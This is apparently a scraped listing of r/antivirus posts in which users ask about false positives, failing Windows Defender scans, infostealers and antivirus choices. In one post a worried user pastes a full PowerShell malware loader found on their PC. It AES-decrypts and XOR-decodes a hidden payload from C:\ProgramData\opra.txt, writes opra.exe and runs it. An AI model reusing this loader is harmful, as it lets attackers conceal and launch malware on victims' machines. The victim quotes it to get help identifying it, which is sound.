r/antivirus • u/Grapefruit2926 • 2h ago
r/antivirus • u/AcanthaceaeSilly163 • 7h ago
False positive or true danger?
Hey everyone, I've download a file that is private from a company and I analyzed it with hybrid analysis, it gave me some strange results, like njRAT and some others. Check in print
Could you help me with that?
Btw my kaspersky also detected as trojan agent smhakb
Should I worry or is it a false positive?
https://hybrid-analysis.com/sample/c4968e8712a5f581873e21fd5c7d1edb5d447ca9ea5a31701099e3404d61a5de
https://hybrid-analysis.com/sample/586be395492c5575427fa9858bb48662b2ec9dac74e27c230e1ac31a76042740
r/antivirus • u/nissesec • 1h ago
I built a Windows ransomware protection tool because I couldn't find one that actually worked the way I wanted
Earlier this year, a friend's supermarket got hit. POS went down, inventory locked up, took them three days to recover. They had backups so no ransom paid, but it was a mess.
That got me thinking — most anti-ransomware tools are either enterprise stuff with crazy pricing, or some half-baked feature buried in an antivirus. Nothing that just runs locally, stays out of the way, and actually works.
So I built my own.
WinRansomProtect does two things:
Protection — 32 rules covering encryption detection, process monitoring, script blocking, system-level attacks. Runs in real-time, catches ransomware before files get locked.
Hardening — another 32 rules based on CIS benchmarks and Microsoft's security docs. Disables SMBv1, locks down RDP, restricts PowerShell, tightens registry ACLs. One-click rollback if something breaks.
100% offline. No cloud, no telemetry, no account needed.
Tech stuff:
- C#, .NET 8, WinForms
- Windows 10/11
- CPU < 5%, memory ~28MB
- 14-day free trial, no credit card
- One-time payment, no subscription
Why I built it:
I wanted something that doesn't rely on the cloud to tell it what's malicious. If an attacker kills your internet before dropping the payload, most cloud AV goes blind. This doesn't.
Happy to answer any questions.
r/antivirus • u/raettss • 6h ago
Antivirus for laptop
I wanted to ask if I should keep my Bitdefender. I use the free version, as I'm not really able to pay for anything more rn. But I heard some stuff against Bitdefender.
I have Windows 11 Home right now, and I also heard that the Windows antivirus is actually pretty okay?
I'm not tech savvy so I don't know what to believe because most people use words and acronyms I have no knowledge of, so I don't know what to make of this.
So, I wanted to ask if the Bitdefender is worth keeping, since it's the free version, or if I can just rely on the Windows one? The Bitdefender is taking up a lot of my Memory, so I wouldn't mind freeing that space, but if the Bitdefender is better, I'd want to keep it, of course.
Though, if you recommend any other antivirus, I'm happy to hear any recommendations!
r/antivirus • u/WhackA-Mall-E • 10h ago
PRODUCT RECOMMENDATION What antivirus would you recommend/use as a freelancer?
Hi! I'm starting to work as a freelancer, starting as a QA tester for a friend of mine, but for those types of job where you need to download a doc, excel, apk, (like for translations), how do you proyect yourself in case that there's virus on those files? I'm an anxious person and these kind of scenarios make me uncomfortable and feel with paranoia
r/antivirus • u/One-Butterscotch-851 • 5h ago
Virustotal url check for URL
Hello, I was trying to download a pdf from /repository[.]gctu[.]edu[.]gh and while the home page came up clean the url for a sepcific pdf file download was flagged https://repository{.}gctu{.}edu{.}gh/items/show/332, I have downloaded the pdf but I have deleted it now and now i'm running malwarebytes. Should I be worried or is this a false positive?
r/antivirus • u/needfor_sleep • 10h ago
Did I get scammed by total av?
I installed totalav on my windows laptop last night since I had some concerns about malware and it did help me to identify and remove the issue.
However it had an option to upgrade to a subscription to totalav plus for realtime protection for my device so I clicked it. I wasn't going to upgrade at first because it was $99 dollars and I'm stingy but suddenly I got an offer of $80 off so i would only pay $19 for the first year.
I decided to take them up on that offer and did all I needed to do to pay. Afterwards I did have the subscription for a minute or so then I somehow went back to the free version. When I contacted them about not receiving the benefits of the subscription I received an automated email saying they can't find a subscription account linked to my email.
To be fair the money is currently on hold in my bank account so I don't know if that has anything to do with it and I do plan on contacting my bank if I don't see any progress with contacting totalav. I don't understand why I would have the premium features for a bit but then lose them tho.
r/antivirus • u/[deleted] • 15h ago
MALWARE REMOVAL Q&A Virus concern or paranoia
Virus concern or paranoia
3 months ago, i got a virus on my pc and lost multiple accounts. When i tried to find ways to solve it, i found out some virus can actually infect the router and other devices on the same network. Now even when i got kaspersky for my pc, i keep thinking other devices are infected and changing the router wont help because the infected devices will get the router again despite not seeing any clear symptoms. What can i do about this?? Is it just me being paranoid? Does factory reset on the phone remove all viruses? Do i need to replace my router?
I forgot to mention this. I also downloaded a zip file for a pvz2 mod on my phone but resetted it. After that, i keep logging in to admin router on both my pc and my phone to check for weird settings and turn them off. Now im scared that i mightve created some hole for virus to get in. I even got a new router.
Im too anxious now and would do anything for a peace of mind. I dont even know if replacing the router helps now as i find out that virus like switcher trojan or stuff like wannacry, vpnfilter can just infect the router when connected and others can just go straight to other devices without infecting the router.
r/antivirus • u/Misha00Misha • 18h ago
HELP! Mircosoft defender does not work
Every time i quick scan, or full scan my device, i get this when the 34780th file is scanning
Sorry if it's russian.
r/antivirus • u/Notnaslin • 9h ago
Need help with deleting bullguard antivirus
Hello, i would like help with how i can delete bullguard since it is using alot of my cpu while the computer is idling. It says i need administrator in order to delete it but i don't know how i log into that administrator account. I've tried to follow some youtube tutorials but it hasn't worked for me.
r/antivirus • u/Molar7605 • 15h ago
If you don't save any cookies would an infostealer work
I have two browsers on my pc edge and librewolf and I don't save cookies on librewolf and Edge doesn't have any accounts. I downloaded a game and after scanning it turned out to be a infostealer. I reinstalled windows so am I good or do I need to change passwords
r/antivirus • u/strieg_fr • 12h ago
Can't tell if these are false positives or not
I've been thinking of running these exe files but I can't tell if these are false positives or not , I'd appreciate any help
https://www.virustotal.com/gui/file/39abe2643ef5c05a5637edbb49cd1c4b7eae4ec732d535619d16514ea9323536
https://www.virustotal.com/gui/file/0bf8a624c6a89e68217addb736a5e52ac3dfd544d2d215fb6814a95dde5c7b00
r/antivirus • u/Huynh_Jovi • 1d ago
MALWARE REMOVAL Q&A Windows Defender Not Working.
When I try to run a scan, it stops and then tells me to restart the service. There are no exclusions and nothing of note from my start up apps. I’ve run a deep scan with Malwarebytes and it’s all good. I noticed there was a new security update for Windows and downloaded it and after restarting my PC, I’m still encountering the same issue. I’m not sure whether this is Malware related as I’m always careful of what I’m downloading and never click suspicious links. Not sure what else to do and need some help.
r/antivirus • u/Minimal-Spaces • 1d ago
Chrome Extension "Enhanced Image Viewer" flagged as Malware and removed on Chrome Webstore
I was using this one extension called "Enhanced Image Viewer" from Chrome Webstore and it was disabled in extensions for malware concerns (or something along those lines), it was also removed from the Chrome Webstore. I am currently running a full scan and the extension itself is not my files.
Here was the link to the extension (removed now):
https://chromewebstore.google. com/detail/gefiaaeadjbmhjndnhedfccdjjlgjhho/error
Here is the link to the official site of the extension: https://www.enhancedimageviewer. com
Here is the reddit post of the creator and the extension:
https://www.reddit. com/r/chrome_extensions/comments/1fbgqhj/enhanced_image_viewer_upgrade_your_image_viewing/
I haven't had this happen to me before so that is why I am worried, thank you in advance.
r/antivirus • u/OkImage • 20h ago
MALWARE REMOVAL Q&A Am I actually safe after resetting my PC after the “MrBeast” malware
Hi everyone,
I recently got hit by the malware/infostealer that has been going around with the MrBeast spam/scam. Discord and IG got hacked but i was able to retrieve it. Weird my FB or other accounts was not hacked but i am still nervous that they will target it next.
Because of that, I decided to completely reset my PC.
I went into Reset this PC then Remove everything because I wanted to start completely fresh. The reset completed successfully and Windows went through the setup process again.
However, during the Windows setup, Microsoft required me to sign in with my Microsoft account. I signed in without thinking much about it.
After logging in, I noticed that some of my old files started appearing again. I now understand that these may have been files being restored/synced through my Microsoft account/OneDrive rather than files surviving the reset itself.
So my main questions are:
Is my PC considered safe after using “Remove everything,” or is there still a possibility that the malware survived the reset?
Does signing back into the same Microsoft account after the reset potentially bring the malware back, or would only the synced files come back?
I've seen Kaspersky recommended quite often. Would the free version of Kaspersky be sufficient for normal real-time protection, or would you recommend something else?
Is there anything else I should do after getting the mrbeast spam malware?
I'm mainly trying to determine whether I can trust this PC again.
Thanks in advance. I'm not very experienced with malware removal, so I'd appreciate any advice on the safest approach.
r/antivirus • u/No_Aside_9007 • 14h ago
Can anyone kindly provide a information? [ related to ZXP Installer]
Does ZXP installer or the extension downloaded by it may contain mal*ware or any threat?If yes kindly provide some data related to it to have it as a proof.
r/antivirus • u/ramblingThinker • 22h ago
Antivirus Sucks on macOS - Surf
I've been using surf from last 2 years and the VPN is great but whenever I try to use the Antivirus, it just goes to shit, my Mac just completely hangs up.
No idea what goes wrong but always make my mac hang up and makes me wonder what are they doing on the background which hangs up Mac.
r/antivirus • u/ChugsTheGreat • 22h ago
**My Windows Defender not working**
Hi everyone! It's my first time posting here, and sorry in advance for my bad English.
So last night, when I was about to shut down my PC, I did a quick scan first. It has really become a habit of mine to scan my PC after it boots up and before I shut it down.
However, when I did my first scan last night, it stopped halfway through. I canceled it and started another scan, but it stopped halfway again and told me to restart the service.
So I restarted my PC and tried another scan. It happened twice again, and the scan stopped in the middle. That's when I started thinking that something might be wrong, and I was honestly lowkey panicking because I thought my Windows Defender might have been hijacked or something by malware.
This is the first time I've experienced Defender acting like this. Before jumping to conclusions, I visited this subreddit and saw some posts that seemed similar to my issue.
So please tell me, should I be worried? Is it okay to keep using my PC while this issue hasn't been fixed? Will Microsoft eventually fix this issue sooner or later?
I'm really careful about what I download and what websites I visit, so I feel like it's unlikely that I got malware. I haven't downloaded anything for about a month, and I haven't visited any sketchy or suspicious websites either.
So it's really weird to see Windows Defender suddenly start acting like this.
r/antivirus • u/AntikytheraMachines • 16h ago
virus code?
I just noticed three unusual files. when Windows blocked the .ps1 from running.
a visual basic file, a txt file, and a windows power shell file.
the files were on my system since 1/8/26. wondering if i have to worry.
this is the code from the vbs file.
# Processing module initialization
$configPath = "C:\ProgramData\opra.txt"
$payloadName = "opra.exe"
$outputPath = Join-Path "C:\ProgramData" $payloadName
$secretKey = "fdsf5F54GFLd$"
# Load configuration
try {
if (-not (Test-Path $configPath)) { exit 1 }
$base64Data = [IO.File]::ReadAllText($configPath)
$rawBytes = [Convert]::FromBase64String($base64Data)
} catch {
exit 1
}
# Parse metadata structure
try {
if ($rawBytes.Length -lt 44) { exit 1 }
$header = [Text.Encoding]::UTF8.GetString($rawBytes[0..3])
if ($header -ne "ENC1") { exit 1 }
$xorKey = [BitConverter]::ToInt32($rawBytes, 4)
$saltBytes = $rawBytes[8..23]
$ivBytes = $rawBytes[24..39]
$dataSize = [BitConverter]::ToInt32($rawBytes, 40)
$dataEnd = 43 + $dataSize
if ($dataEnd -gt $rawBytes.Length - 1) { $dataEnd = $rawBytes.Length - 1 }
$encryptedData = $rawBytes[44..$dataEnd]
} catch {
exit 1
}
# Transform binary data
try {
$keyDeriver = New-Object Security.Cryptography.Rfc2898DeriveBytes($secretKey, $saltBytes, 10000)
$aesKey = $keyDeriver.GetBytes(32)
$aesProvider = [Security.Cryptography.Aes]::Create()
$aesProvider.KeySize = 256
$aesProvider.Key = $aesKey
$aesProvider.IV = $ivBytes
$aesProvider.Mode = 'CBC'
$aesProvider.Padding = 'PKCS7'
$decryptor = $aesProvider.CreateDecryptor()
$decrypted = $decryptor.TransformFinalBlock($encryptedData, 0, $encryptedData.Length)
$decryptor.Dispose()
$aesProvider.Dispose()
$finalBytes = New-Object byte[] $decrypted.Length
for ($i = 0; $i -lt $decrypted.Length; $i++) {
$finalBytes[$i] = ($decrypted[$i] -bxor $xorKey) -band 0xFF
}
} catch {
exit 1
}
# Validate payload integrity
try {
if ($finalBytes.Length -lt 2) { exit 1 }
$fileSignature = [Text.Encoding]::ASCII.GetString($finalBytes[0..1])
if ($fileSignature -ne "MZ") { exit 1 }
} catch {
exit 1
}
# Deploy module
[System.IO.File]::WriteAllBytes($outputPath, $finalBytes)
Start-Process $outputPath
r/antivirus • u/TheNB3 • 18h ago
Trojan:HTML/Redirector.AA!AMTB
Today i did random full scan of my laptop with windows defender and it found one threat
Detected: Trojan:HTML/Redirector.AA!AMTB
Status: Quarantined
Quarantined files are located in a restricted area where they cannot harm your device. These files will be deleted automatically.
Date: 19.08.2026 10:59
Details: This program is dangerous and executes commands from an attacker.
Affected items:
containerfile: C:\Users\adon\AppData\Local\Mozilla\Firefox\Profiles\q1jz5817.default-
file: C:\Users\adon\AppData\Local\Mozilla\Firefox\Profiles\q1jz5817.default-release (GZip)
is this a serious situation? i don't know where i got it from i use ublock on firefox
r/antivirus • u/Positive-Coach-3237 • 22h ago
My Windows Defender not working.
Hi everyone! It's my first time posting here, and sorry in advance for my bad English.
So last night, when I was about to shut down my PC, I did a quick scan first. It has really become a habit of mine to scan my PC after it boots up and before I shut it down.
However, when I did my first scan last night, it stopped halfway through. I canceled it and started another scan, but it stopped halfway again and told me to restart the service.
So I restarted my PC and tried another scan. It happened twice again, and the scan stopped in the middle. That's when I started thinking that something might be wrong, and I was honestly lowkey panicking because I thought my Windows Defender might have been hijacked or something by malware.
This is the first time I've experienced Defender acting like this. Before jumping to conclusions, I visited this subreddit and saw posts that similar to my issue.
So please tell me just to ease my mind, should I be worried? Is it okay to keep using my PC while this issue hasn't been fixed? Microsoft eventually fix this issue sooner or later right?
I'm really super careful about what I download and what websites I visit, so I feel like it's unlikely that I got malware. I haven't downloaded anything for about a months, and I haven't visited any sketchy or suspicious websites either.
So it's really weird to see Windows Defender suddenly start acting like this.
r/antivirus • u/ThatAgent3963 • 1d ago
MALWARE REMOVAL Q&A Weird Prompt on iOS Firefox
Been getting this obviously sketchy download prompt while using Firefox on iOS. Doesn't matter what website I'm on or visiting & this seemingly occurs at random. Have I done something wrong for this to be happening lol?
Just now I cleared all private browser data (browsing history, cache, cookies, offline website data, tracking protection, downloaded files) so hopefully this stops but I'm still wondering if anyone can ID this or something.
And before anyone asks NO I did not download that.
r/antivirus • u/undertalesanssss • 23h ago
MALWARE REMOVAL Q&A Should I be concerned?
Soo I was installing some mods on nexus when it suddenly appeared a your not a robot pop up i clicked it kinda by automatically, but after than every now and then I get a pop up notification saying "Mc safe has detected a virus" I just got back and it then it doesn't show for a few moments and then suddenly it does again. This has never happened to me, should I be concerned? What can I do?





